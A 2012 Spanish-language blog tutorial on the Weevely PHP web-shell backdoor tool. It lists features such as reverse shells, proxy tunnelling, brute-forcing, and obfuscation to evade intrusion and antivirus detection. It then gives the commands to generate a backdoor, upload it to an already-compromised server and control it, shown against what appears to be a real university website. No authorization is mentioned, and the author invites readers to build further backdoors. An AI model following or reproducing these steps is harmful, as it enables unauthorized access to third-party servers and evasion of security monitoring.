sábado, 15 de diciembre de 2012

Weevely - Backdoor 



Es una herramienta esencial para la explotación posterior de aplicaciones web, y se puede utilizar como puerta trasera sigilo o como una cáscara web para gestionar las cuentas de fiar web. En esta ocasion regresa con mayor estabilidad, facilidad de uso y con algunas características de la red deliciosos útiles durante las pruebas de penetración.


Los nuevos módulos para la nueva version 0.7 son :
  • More than 30 modules to automatize administration and post exploitation



  1. Ejecutar comandos y navegue sistema de archivos remoto, incluso con restricción de seguridad de    PHP.
  2. Auditoría de errores de configuración de servidor comunes.
  3. Ejecutar consola SQL pivotante en la máquina de destino.
  4. Abrir proxy HTTP para hacer un túnel a través de su tráfico de destino.
  5. Fácil transferencia de archivos desde y hacia el objetivo.
  6. Engendro conchas TCP inversa y directa.
  7. Fuerza bruta las contraseñas de los usuarios del sistema de destino.
  8. Ejecutar escaneo de puertos de equipo de destino.
  9. Comunicaciones de puerta trasera se ocultan en las cookies HTTP.
  10. Las comunicaciones son ofuscado para eludir la detección NIDS firma.
  11. Backdoor código polimórfico PHP se ofusca para evitar HIDS detección AV.
  12. Y muchos mas....=)

  • Net.proxy módulo envía el tráfico HTTP a través de la máquina de destino remoto como una aproximación real. Primer plazo: net.proxy, a continuación, establezca "http://localhost:8080" como proxy HTTP en el navegador web favorito y navegar de forma anónima a través del servidor web de destino.

  • Net.php_proxy módulo se instala un script PHP para navegar de forma anónima a través de la máquina de destino remoto.

  • Net.scan módulo realiza escaneo de puertos desde el servidor web de destino.

  • File.rm módulo elimina los archivos y directorios.



Bueno con todo este pequeña descripcion de esta herramienta, podemos ver que nos da la facilidad de crear diversas puertas traseras.......=)

Ahora nos toca hacer una pequeña demostración de la habilidad de Weevely.....=D.......Para esta demostación voy a utilizar mi Weevely que ya viene instalado por defecto en BackTrack5R3.....=).....Pues comenzemos...!!!!!!!!

Comenzamos abriendo nuestro Weevely......=)


Weevely v07....Yeahh....!!!!!!!

Ahora vamos a crear nuestro pequeño backdoor.....=)......Para eso ingresamos la siguiente linea......=)

# python weevely.py generate <password> <ruta del archivo>




En mi caso seria asi :

# python weevely.py generate admin /root/Desktop/crash.php 


A continuación nos debe responder de la siguiente forma nuestro Weevely......=)

[generate.php] Backdoor file '/root/Desktop/crash.php' create with password 'admin'

Esto nos quiere decir que el backdoor se ha creado correctamente y su password es admin....Yeahh....!!!


Aqui podemos observar el archivo creado......=)

Bueno ahora necesitamos subir nuestro archivo, para esto ya debemos de haber subido nuestra shell a un servidor del cual hemos explotado una vulnerabilidad.......=)




Ahora vamos a subir nuestro archivo.......=D


Subiendo backdoor al servidor....=)


Como podemos observar nuestro archivo ha podido subir sin ningun problema.....=D

Ahora volvemos a nuestro Weevely para digitar la siguiente linea....=)

#python weevely.py <url> <password>




En mi caso seria :

#python weevely.py http://wedupla.upla.edu.pe/subearchivos/crash.php admin




Yeahh...!!!!!!!!!!!!!!!!!!!......Ahora vamos a inspeccionar los archivos del servidor.....=)

Primero voy a ingresar  ===> ls


Podemos ver que nos muestra varios archivos que se encuentran en el servidor, incluyendo nuestro archivo crash.php.......=)

Ahora ingresamos ====> uname , que nos va a dar información del servidor.


Continuamos con  ====> cd ..


Finalizamos con    ====> ls

Ahora vemos mas archivos que se encuentran en el servidor...=)

Por ultimo repetimos los mismo ....=)

Ingresamos ====> cd ..


Finalizamos con =====> ls

Bueno creo que eso es todo por ahora.....=)...Espero que les servi de algo esta gran herramienta, claro que solo la he presentado, ya depende de ustedes poder hacer otros tipos de backdoors, solo seria cuestión de "jugar" un poco mas con Weevely.

Creo que ya no tengo nada mas que adicionar , asi que me despido y sera hasta la próxima....Nos vemos.


No hay comentarios:

Publicar un comentario